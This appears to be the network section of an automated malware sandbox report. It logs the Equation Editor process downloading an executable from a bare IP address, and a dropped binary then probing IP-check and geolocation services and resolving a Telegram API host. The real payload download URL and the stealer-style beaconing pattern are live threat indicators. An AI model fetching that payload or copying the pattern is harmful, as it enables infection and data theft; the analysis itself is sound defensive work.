                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.829715014 CET8.8.8.8192.168.2.220x2cd2No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.829715014 CET8.8.8.8192.168.2.220x2cd2No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.013624907 CET8.8.8.8192.168.2.220xdbe7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.013624907 CET8.8.8.8192.168.2.220xdbe7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.690304995 CET8.8.8.8192.168.2.220x8295No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • api.telegram.org
                                                                                                                                  • 87.120.84.39
                                                                                                                                  • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 87.120.84.39 | 80 | 3600 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 18:08:03.436898947 CET | 322 | OUT | GET /txt/Xkl0PnD8zFPjfh1.exe HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                  Host: 87.120.84.39
                                                                                                                                  Connection: Keep-Alive
Nov 19, 2024 18:08:04.159611940 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.26.2
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:04 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 837120
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 04:32:51 GMT
                                                                                                                                  ETag: "cc600-6273c86a96582"
                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49162 | 193.122.130.0 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 18:08:10.250392914 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
Nov 19, 2024 18:08:10.728616953 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 2d50e1ac90e8c4ba632817b5fd14ca0e
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 19, 2024 18:08:10.761604071 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
Nov 19, 2024 18:08:10.865844965 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 6376f603f7872014620d5661f481cc28
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 19, 2024 18:08:11.081865072 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 6376f603f7872014620d5661f481cc28
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 19, 2024 18:08:12.015062094 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
Nov 19, 2024 18:08:12.118700027 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:12 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 25782e1ec8e5aae74dcd111928c69b62
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 19, 2024 18:08:12.337897062 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:12 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 25782e1ec8e5aae74dcd111928c69b62
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  2 | 192.168.2.22 | 49165 | 193.122.130.0 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 19, 2024 18:08:13.667134047 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Nov 19, 2024 18:08:14.160260916 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:14 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 5cf2d86783815a69bbd458cbb7d1964f
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  3 | 192.168.2.22 | 49167 | 158.101.44.242 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 19, 2024 18:08:14.873955011 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:15.450604916 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:15 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bebaf233f37d20d32d3e9cd677a303de
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  4 | 192.168.2.22 | 49169 | 132.226.8.169 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 19, 2024 18:08:16.157659054 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:17.776053905 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:17 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  5 | 192.168.2.22 | 49171 | 132.226.247.73 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 19, 2024 18:08:18.816247940 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:19.480195999 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:19 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bc4f74b7afa83fea76e884ed6d151312
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:19.689795017 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:19 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bc4f74b7afa83fea76e884ed6d151312
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  6 | 192.168.2.22 | 49173 | 193.122.130.0 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 19, 2024 18:08:20.177447081 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:20.636312008 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:20 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 9c3ec8b09512c98b8fecaf545f672cbd
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:20.845897913 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:20 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 9c3ec8b09512c98b8fecaf545f672cbd
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  7 | 192.168.2.22 | 49175 | 193.122.130.0 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 19, 2024 18:08:21.330288887 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:21.808851004 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 97803bff483a645c5bbfe17c95f4f17c
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:22.017802000 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 97803bff483a645c5bbfe17c95f4f17c
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  8 | 192.168.2.22 | 49177 | 193.122.130.0 | 80 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 19, 2024 18:08:22.530744076 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:23.000313997 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:22 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d4eed6dfbaf333f264b6ccdf733e9c5e
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                  Nov 19, 2024 18:08:23.205885887 CET | 320 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:22 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 103
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d4eed6dfbaf333f264b6ccdf733e9c5e
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  0 | 192.168.2.22 | 49163 | 188.114.97.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-11-19 17:08:11 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:11 UTC | 839 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mz61s00Wei8fTPzAVpgO3zH3eoJ%2F6gTzTJTsdWAwQi5L1Db0RgTvgwjsXeKyNuzAQWBuM7HRHKKGmIZA1gRrgWVe%2FaB2kK3gPjKfvmtwhfPxmh8bPTyc6GD3BVoNlU%2BNe2Sk91Zw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd04388e8c69-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1824&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1553191&cwnd=213&unsent_bytes=0&cid=3a1a9d60ef24617e&ts=583&x=0"
                                                                                                                                  2024-11-19 17:08:11 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  1 | 192.168.2.22 | 49164 | 188.114.97.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-11-19 17:08:12 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-11-19 17:08:12 UTC | 850 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:12 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 1
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvABsR0ZUqgCmuTOfFgv03N%2BLd6yQoGiTyDpxrK8LABhW6d64MXlPma%2BRh%2BfPLferuX%2B01wIVgG60HQnU5of4TYqjiatUj2bdDSxqPv17HES%2BPPhxmVdoXKYeHWVzL1NM2PWlRjP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd0b6c2bc40e-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1778&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1646926&cwnd=173&unsent_bytes=0&cid=866ced8d249b222f&ts=180&x=0"
                                                                                                                                  2024-11-19 17:08:12 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  2 | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-11-19 17:08:14 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:14 UTC | 846 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:14 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 3
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqitHzy6i78t%2FEY9pl2Bl2eqb1WnVbQ59jZRISgIDcOfYwQlMC1WKwaXp2kEt4gYCU16LasTrKIbwGs3Omx6gdxUHWztkcAROcH4I6%2FzbLc3r2WnAn09Czz%2FxDIHJunvcJLUj4eP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd182ca04327-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1623&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1649717&cwnd=245&unsent_bytes=0&cid=8d72017e43bd27e8&ts=165&x=0"
                                                                                                                                  2024-11-19 17:08:14 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  3 | 192.168.2.22 | 49168 | 188.114.97.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-11-19 17:08:15 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:16 UTC | 846 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:16 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 5
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlHlK5VJ37OnFinX7l7n1q41oR2oj8YboUBlwSFoq%2Figv4e2X5RW1eJpFk0TD4DurIQmMR6H%2BtYxOsl7mFtNwECHhkaOj%2FrslZfEps29MdnFDwrpZS8ogqkF92KnZ6H4pJ2JWpUl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd204ecc42f2-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1870&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1678160&cwnd=211&unsent_bytes=0&cid=864dcac4fb29406c&ts=154&x=0"
                                                                                                                                  2024-11-19 17:08:16 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  4 | 192.168.2.22 | 49170 | 188.114.96.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-11-19 17:08:18 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:18 UTC | 850 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:18 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 7
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URj%2F4IgzCjtRUt7q%2Bi6rGgq17qjK%2BhCtjBbz0xa2XToLugV%2Bfkdi6VNwFv5QrA9wXuwhNGxWmsPplXmK5IpG5GpceujCbfzarvlJOiDy36PfhEBmE9Uoo%2Ff8TVIFg82DUQgVxgmI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd2ee8557d00-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1845&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1527995&cwnd=241&unsent_bytes=0&cid=5bfd5d9f819817f1&ts=161&x=0"
